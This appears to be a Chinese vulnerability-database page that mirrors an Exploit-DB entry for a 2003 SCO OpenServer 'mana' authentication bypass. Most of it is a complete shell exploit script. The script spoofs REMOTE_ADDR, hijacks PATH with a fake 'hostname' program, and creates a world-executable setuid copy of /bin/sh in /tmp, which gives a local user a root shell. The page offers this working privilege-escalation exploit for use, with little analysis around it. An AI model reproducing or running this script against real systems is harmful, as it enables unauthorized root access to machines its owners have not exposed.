SCO OpenServer 5.0.x – ‘mana’ ‘REMOTE_ADDR’ Authentication Bypass

SCO OpenServer 5.0.x – ‘mana’ ‘REMOTE_ADDR’ Authentication Bypass

漏洞ID 1054167 漏洞类型
发布时间 2003-09-15 更新时间 2003-09-15
图片[1]-SCO OpenServer 5.0.x – ‘mana’ ‘REMOTE_ADDR’ Authentication Bypass-安全小百科CVE编号 N/A
图片[2]-SCO OpenServer 5.0.x – ‘mana’ ‘REMOTE_ADDR’ Authentication Bypass-安全小百科CNNVD-ID N/A
漏洞平台 SCO CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23141
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/bin/sh
#source: http://www.securityfocus.com/bid/8616/info
#
#It has been reported that SCO OpenServer Internet Manager 'mana' process is prone to an authentication bypass issue. The issue is reported to occur as a local user is able to export the REMOTE_ADDR environment variable and set its value to 127.0.0.1. This would cause the mana process to execute the file menu.mana with administrative privileges without proper authentication. Normally executing mana would require proper credentials.
#

#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#

REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

chmod 755 hostname

/usr/internet/admin/mana/mana > /dev/null

/tmp/sh

相关推荐: Microsoft Commerce Server 2000 OWC Package Installer Local Command Execution Vulnerability

Microsoft Commerce Server 2000 OWC Package Installer Local Command Execution Vulnerability 漏洞ID 1101818 漏洞类型 Access Validation Err…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享